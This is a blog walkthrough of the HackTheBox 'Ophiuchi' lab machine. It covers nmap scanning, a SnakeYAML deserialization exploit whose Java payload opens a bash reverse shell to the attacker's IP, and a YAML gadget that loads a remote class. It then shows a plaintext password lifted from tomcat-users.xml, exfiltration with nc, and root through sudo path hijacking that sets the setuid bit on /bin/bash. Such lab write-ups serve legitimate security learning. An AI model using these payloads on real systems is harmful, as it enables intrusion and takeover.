Ophiuchi HackTheBox WalkThrough

This is Ophiuchi HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Ophiuchi HackTheBox machine. Before starting let us know something about this machine. It is Linux OS box with IP address 10.10.10.227 and difficulty Medium assigned by its maker.

First of all connect your PC with HackTheBox VPN and make sure your connectivity with Ophiuchi machine by pinging its IP 10.10.10.227. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it also helps in finding vulnerabilities. I have used nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -sV -oA nmap/Ophiuchi 10.10.10.227

Performing Nmap scan during Ophiuchi HackTheBox WalkThrough

Nmap found ports 22 and 8080 as open. OpenSSH 8.2p1 on port 22 and apache tomcat webserver is running on port 8080. After going to URL http://10.10.10.227:8080 found Online YAML Parser. I didn’t know anything about YAML Language before this box. After a quick googling found that it is human readable data-serialization language. Now a days Deserialization Vulnerability is common in most of the parsers.

Keeping this in mind I googled YAML Parser Vulnerability and on very first page got many number of articles related to SnakeYAML deserialization vulnerability. This was the article that guided me most throughout the whole exploitation process. From here I got a link to actual exploit code which is this. After some try and error I got user shell using this exploit.

Getting User Shell

So follow the given steps to get user shell.

1. Clone the repo https://github.com/artsploit/yaml-payload.git

2. Modify file AwesomeScriptEngineFactory.java at yaml-payload/src/artsploit/ by replacing definition of method AwesomeScriptEngineFactory() as given below

public AwesomeScriptEngineFactory() {
        try {
           Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
           Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

with the following definition

public AwesomeScriptEngineFactory() {
        String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.22/1234 0>&1"};
        String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
        try {
            Runtime.getRuntime().exec(cmd);
            Runtime.getRuntime().exec(jex);
            Runtime.getRuntime().exec("echo $jex");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

and replace IP address with your tun0 IP in above code. The final exploit will look something like this.

YAML Deserialization exploit
Snippet

3. Compile AwesomeScriptEngineFactory.java using $ javac.

4. Start python3 webserver in yaml-payload/src/ folder in one window

5. Open netcat listener in other window

6. At last parse below code in browser at http://10.10.10.227:8080

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.22/"]
  ]]
]
Executing code in Online YAML Parser during Ophiuchi HackTheBox WalkThrough

$ git clone https://github.com/artsploit/yaml-payload.git

$ cd yaml-payload

$ vi src/artsploit/AwesomeScriptEngineFactory.java

$ javac src/artsploit/AwesomeScriptEngineFactory.java

$ cd src

$ sudo python3 -m http.server 80

$ nc -nvlp 8888

$ whoami && id

Getting user shell in Opiuchi htb machine

We have got shell as user tomcat. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

Upgrading Shell to fully qualified Linux Shell

When I tried to access user.txt file inside /home/admin/ directory it gave me access denied permission. We have to anyhow upgrade the shell to user admin only then we will be able to access user flag. After some enumeration got file tomcat-users.xml inside directory /opt/tomcat/conf/. It contains password of user admin which is whythereisalimit.

$ cd ~

$ grep -i username -A3 -B3 conf/tomcat-users.xml

Let us switch to user admin and capture user flag.

$ su - admin

Password: whythereisalimit

$ whoami && id

Switching to user Admin during Ophiuchi HackTheBox WalkThrough

Capture User Flag

$ cat user.txt

Capturing user flag during Ophiuchi HackTheBox WalkThrough

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. There are two way to find PrivEsc vector. Either use some Post Exploitation Enumeration script like Linpeas or go manually. This time I followed manual approach.

Finding PrivEsc Vector

$ sudo -l command revealed that user admin can run /usr/bin/go run /opt/wasm-functions/index.go command as root user privilege. If we would exploit this sudo right given to user admin we would get root shell.

Sudo-l command output on Ophiuchi HTB Machine

After analyzing the file index.go at /opt/wasm-functions/ found that this file is importing main.wasm file from directory /opt/wasm-functions/. Also, if the value of variable f is equals to 1, it will execute /bin/sh deploy.sh file.

One thing need to be noted that main.wasm and deploy.sh both files have been used without their absolute path. This introduces here path hijacking vulnerability and hence can be abused to get shell. When any file executes it starts its search by looking into its current directory then moving above the directory.

We will abuse this searching feature by introducing our own malicious deploy.sh and main.wasm files. So when index.io will be executed from other folder it will first execute our malicious files because that will be present in the same folder and meanwhile we will get shell. Since index.go is executed with root user privilege so deploy.sh and main.wasm will also be executed as root privilege and we will get root shell.

When I tried this I got root shell. So here our privilege escalation vector is Privilege Escalation by Sudo Right Exploitation via Path Hijacking.

$ cat /opt/wasm-functions/index.go

According to value of variable f in the above index.io file we need to change its value to 1 only then it will execute our deploy.sh file. We can change its value to 1 by making some changes to file main.wasm. But main.wasm is in webAssembly binary format and we can’t make any change to binary file. So for this we will use a tool $wasm2wat to change it from webAssembly binary to WebAssembly text format and then make 0 to 1 there.

After modification we will convert it back into webAssemply binary format using tool $wat2wasm. You can install both these tool on your Kali using the command $ sudo apt install wabt. So let us transfer main.wasm file from directory /opt/wasm-functions/ to our Kali machine to make changes.

On Ophiuchi Machine

$ cd /opt/wasm-functions/ && ls -la

$ cat main.wasm | nc 10.10.14.22 1234 # change IP to your tun0 IP

On Kali Machine

$ nc -l -p 1234 > main.wasm < /dev/null

Downloading main.wasm file on our Kali Machine during Ophiuchi HackTheBox WalkThrough

For info on conversion of webAssembly format check this link.

$ wasm2wat main.wasm -o main.wat # translate from webAssembly binary format to WebAssembly text format

$ vi main.wat # Replace i32.const 0) with i32.const 1) in line 2

$ cat main.wat

$ wat2wasm main.wat -o main.wasm # translate from WebAssembly text format back to WebAssembly binary format

$ scp main.wasm [email protected]:/tmp/ # transfer this file back to Ophiuchi Machine in /tmp folder

password: whythereisalimit

Modifying main.wasm file and uploading back to Ophiuchi machine

We have successfully modified wasm.main file and downloaded it into /tmp folder. Let us get root shell by exploiting path hijacking vulnerability. So to get root shell follow the given steps on Ophiuchi machine.

Getting Root Shell

$ cd /tmp && mkdir exploit && cd exploit/

$ mv ../main.wasm .

$ echo "chmod +s /bin/bash" > deploy.sh

$ chmod 777 main.wasm deploy.sh

$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

$ /bin/bash -p

# whoami && id

Getting root shell during Ophiuchi HackTheBox WalkThrough

We have got root shell. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

Capturing root flag during Ophiuchi HackTheBox WalkThrough

This was how I rooted to the Ophiuchi HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.